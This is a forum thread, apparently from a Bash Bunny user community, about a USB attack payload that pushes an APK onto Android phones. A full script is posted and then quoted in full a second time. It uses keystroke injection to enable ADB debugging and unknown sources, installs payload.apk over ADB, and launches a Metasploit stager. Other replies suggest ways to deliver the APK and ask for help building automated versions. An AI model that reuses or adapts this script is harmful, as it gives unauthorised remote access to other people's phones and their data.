Android APK Install

[r1ddl3r]

Put together a quick and dirty bash bunny script. Allows unknown sources on Android device, grabs apk via webrowser, installs and opens.

https://github.com/JakeBernier/bashbunny/blob/master/android/web_delivery/payload.txt

Also working to get adb delivery method working. Curious if anyone knows of a Android keyboard shortcut that will quickly up settings to speed this up?

[LowValueTarget]

Cool payload, here's a couple of suggestions.

1. Put the key commands in a text file under a folder called phones. This will allow someone else to modify the payload for numerous other phones.
   e.g. phones/nexus9_v7.0.txt, phones/galaxys7_v7.0.txt
2. Use the bash bunny as an ethernet device and pull the payload from a webserver there, so you don't rely on any external infrastructure.

Good stuff!

One more note, you could start and try the adb method in case the phone has USB debugging enabled. If not you can fall back to the key commands. I am working on a similar payload for android, but it doesn't have to do with apk's

[r1ddl3r]

Awesome suggestions thank you! I'll work on those and update accordingly. 

There is also the option of simply enabling USB debugging which I'm testing out as well. 

[LowValueTarget]

Check this out too -- may be double work https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/android/open_url

[Dave-ee Jones]

Not sure if this is what your payload does but what you could do is...

Run a python webserver that serves an .apk, the BB telling the phone to download it (open 172.16.64.1:80 in browser using HID) and install it.

[Shadowharvy]

I use this a lot myself.

# Enables ADB and unknown sources on a target abdroid

# Then pushes a payload APK via ADB

#

# Requires android-tools-adb installed on the Bash Bunny

#

# Purple ............Running HID emulation, enabling ADB and unknown sources

# Blue Blinking ...............Running ADB command to push payload.apk

# Red Blinking.......android failed to get an IP address from the Bash Bunny

# Green..............Finished

 

LED SETUP

GET TARGET_IP

GET SWITCH_POSITION

 

ATTACKMODE HID

LED ATTACK

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q DOWNARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 500

Q ENTER

Q DELAY 500

Q DOWNARROW

Q DELAY 800

Q ENTER

Q DELAY 800

Q ENTER

Q DELAY 500

Q DOWNARROW

Q DELAY 500

Q DOWNARROW

Q DELAY 500

Q ENTER

Q DELAY 200

Q ENTER

Q DELAY 200

Q ESCAPE

Q DELAY 200

Q ESCAPE

Q DELAY 200

Q ESCAPE

Q DELAY 200

Q ESCAPE

Q DELAY 200

Q ESCAPE

ATTACKMODE ECM_ETHERNET

LED B 2000

if [ -z "${TARGET_IP}" ]; then

    LED FAIL

exit 1

fi

adb connect ${TARGET_IP}

adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk

adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"

LED FINISH

[Benny639]

Hi there! Can you please explain only little bit about this technique means what is it and why it is used?or guide me where i can find results about this...Actually i am a new hacker and have less knowledge in hacking android...i can hack android 5 and 4 easily with evil-droid or metasploit or FATRAt...so i need some more knowledge..help..Thank you!

 

[J1m]

Which payloads have you tried?

[pati]

On 9/24/2018 at 9:34 PM, Shadowharvy said:

I use this a lot myself.

# Enables ADB and unknown sources on a target abdroid

# Then pushes a payload APK via ADB

#

# Requires android-tools-adb installed on the Bash Bunny

#

# Purple ............Running HID emulation, enabling ADB and unknown sources

# Blue Blinking ...............Running ADB command to push payload.apk

# Red Blinking.......android failed to get an IP address from the Bash Bunny

# Green..............Finished

 

LED SETUP

GET TARGET_IP

GET SWITCH_POSITION

 

ATTACKMODE HID

LED ATTACK

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q DOWNARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 200

Q RIGHTARROW

Q DELAY 500

Q ENTER

Q DELAY 500

Q DOWNARROW

Q DELAY 800

Q ENTER

Q DELAY 800

Q ENTER

Q DELAY 500

Q DOWNARROW

Q DELAY 500

Q DOWNARROW

Q DELAY 500

Q ENTER

Q DELAY 200

Q ENTER

Q DELAY 200

Q ESCAPE

Q DELAY 200

Q ESCAPE

Q DELAY 200

Q ESCAPE

Q DELAY 200

Q ESCAPE

Q DELAY 200

Q ESCAPE

ATTACKMODE ECM_ETHERNET

LED B 2000

if [ -z "${TARGET_IP}" ]; then

    LED FAIL

exit 1

fi

adb connect ${TARGET_IP}

adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk

adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"

LED FINISH

hello Shadowharvy

im trying to execute a payload with a samsung galaxy s3, i have been working with the payload for android url_open but only can download my apk, im interesting in this part of your code adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk, i think it is more easy for just insert the usb bash bunny and it will search our payload and execute it automaticly.

how can i install this requires ? # Requires android-tools-adb installed on the Bash Bunny

Thanks

[Junior247]

Hi,

Can someone please help me deliver an automatic payload that enables unknown sources on Android?